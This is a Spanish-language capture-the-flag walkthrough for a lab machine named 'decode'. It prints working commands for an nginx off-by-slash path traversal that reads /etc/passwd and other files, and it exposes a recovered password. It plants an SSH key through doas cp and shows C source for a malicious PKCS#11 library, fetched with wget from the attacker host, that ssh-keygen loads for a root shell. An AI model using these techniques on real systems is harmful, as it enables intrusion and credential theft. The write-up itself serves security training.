Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.26
❯ nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.26
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-31 19:05 -03
Nmap scan report for 192.168.1.26
Host is up (0.00034s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 27:71:24:58:d3:7c:b3:8a:7b:32:49:d1:c8:0b:4c:ba (RSA)
| 256 e2:30:67:38:7b:db:9a:86:21:01:3e:bf:0e:e7:4f:26 (ECDSA)
|_ 256 5d:78:c5:37:a8:58:dd:c4:b6:bd:ce:b5:ba:bf:53:dc (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Welcome to nginx!
| http-robots.txt: 1 disallowed entry
|_/encode/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.47 seconds❯ gobuster dir -u 'http://192.168.1.26' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,gif,png -r
...
/decode (Status: 200) [Size: 654]
/robots.txt (Status: 200) [Size: 240]
...El robots.txt está lleno de pistas (decode, ../, /lfi../, passwd...):
❯ cat robots.txt
User-agent: decode
Disallow: /encode/
User-agent: *
Allow: /
Allow: /decode
Allow: ../
Allow: /index
Allow: .shtml
Allow: /lfi../
Allow: /etc/
Allow: passwd
Allow: /usr/
Allow: share
Allow: /var/www/html/
Allow: /cgi-bin/
Allow: decode.shEsto apunta a un off-by-slash de nginx (un alias mal configurado permite traversal con decode../). Lo confirmamos leyendo /etc/passwd:
❯ curl 'http://192.168.1.26/decode../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
steve:$y$j9T$gbohHcbFkUEmW0d3ZeUx40$Xa/DJJdFujIezo5lg9PDmswZH32cG6kAWP.crcqrqo/:1001:1001::/usr/share:/bin/bash
decoder:x:1002:1002::/home/decoder:/usr/sbin/nologin
ajneya:x:1003:1003::/home/ajneya:/bin/bashObtenemos el hash de steve y, leyendo su .bash_history, descubrimos una pista hacia un CSR:
❯ curl 'http://192.168.1.26/decode../usr/share/.bash_history'
rm -rf /usr/share/ssl-cert/decode.csrLeemos el CSR y lo decodificamos (con certlogik decoder), que revela la contraseña de steve en un campo:
❯ curl 'http://192.168.1.26/decode../usr/share/ssl-cert/decode.csr'
-----BEGIN CERTIFICATE REQUEST-----
MIIDAzCCAesCAQAwSDERMA8GA1UEAwwISGFja015Vk0xDzANBgNVBAgMBmRlY29k
...
-----END CERTIFICATE REQUEST-----
UTF8String 'i4mD3c0d3r'Con steve:i4mD3c0d3r accedemos por SSH e iniciamos la escalada con sudo -l:
steve@decode:/home$ sudo -l
Matching Defaults entries for steve on decode:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User steve may run the following commands on decode:
(decoder) NOPASSWD: /usr/bin/openssl enc *, /usr/bin/teeTambién buscamos binarios SUID y encontramos doas:
steve@decode:/home/steve$ find / -perm -4000 2>/dev/null
...
/usr/bin/doas
...
steve@decode:/home/steve$ cat /etc/doas.conf
permit nopass steve as ajneya cmd cpsteve puede ejecutar cp como ajneya vía doas. Generamos una clave SSH y colocamos nuestro authorized_keys en el home de ajneya:
❯ ssh-keygen
...
❯ cat ~/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCm67CXrgAM9n34I+kG4ZYOpkx3Eu/AEJIvZe9z09Cbb7q... wh01s17@wh01s17-laptopsteve@decode:/tmp$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCm67CXrgAM9n34I+kG4ZYOpkx3Eu/AEJIvZe9z09Cbb7q... wh01s17@wh01s17-laptop" > authorized_keys
steve@decode:/tmp$ chmod 777 authorized_keys
steve@decode:/tmp$ mkdir .ssh
steve@decode:/tmp$ mv authorized_keys .ssh/
steve@decode:/tmp$ doas -u ajneya cp -r .ssh/ /home/ajneyaNos conectamos como ajneya y obtenemos la primera flag:
❯ ssh ajneya@192.168.1.26
Enter passphrase for key '/home/wh01s17/.ssh/id_rsa':
Linux decode 5.10.0-13-amd64 #1 SMP Debian 5.10.106-1 (2022-03-17) x86_64
...
ajneya@decode:~$Revisamos sus permisos sudo:
ajneya@decode:~$ sudo -l
Matching Defaults entries for ajneya on decode:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User ajneya may run the following commands on decode:
(root) NOPASSWD: /usr/bin/ssh-keygen * /opt/*Podemos abusar de ssh-keygen -D <lib.so> (carga una librería PKCS#11 y ejecuta su C_GetFunctionList). Creamos una librería maliciosa:
❯ cat pwnlib.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
int C_GetFunctionList(void)
{
setuid(0);
setgid(0);
system("/bin/bash");
}
❯ gcc -shared -o pwnlib.so -fPIC pwnlib.cLa colocamos en /opt/decode/ usando el tee que steve puede ejecutar como decoder:
steve@decode:/tmp$ wget http://192.168.1.10:8000/pwnlib.so
steve@decode:/tmp$ cat pwnlib.so | sudo -u decoder /usr/bin/tee /opt/decode/pwnlib.soY desde ajneya la cargamos con ssh-keygen para obtener root:
ajneya@decode:~$ sudo ssh-keygen -D /opt/decode/pwnlib.so
root@decode:/home/ajneya#Obtenemos nuestra flag.
Fin.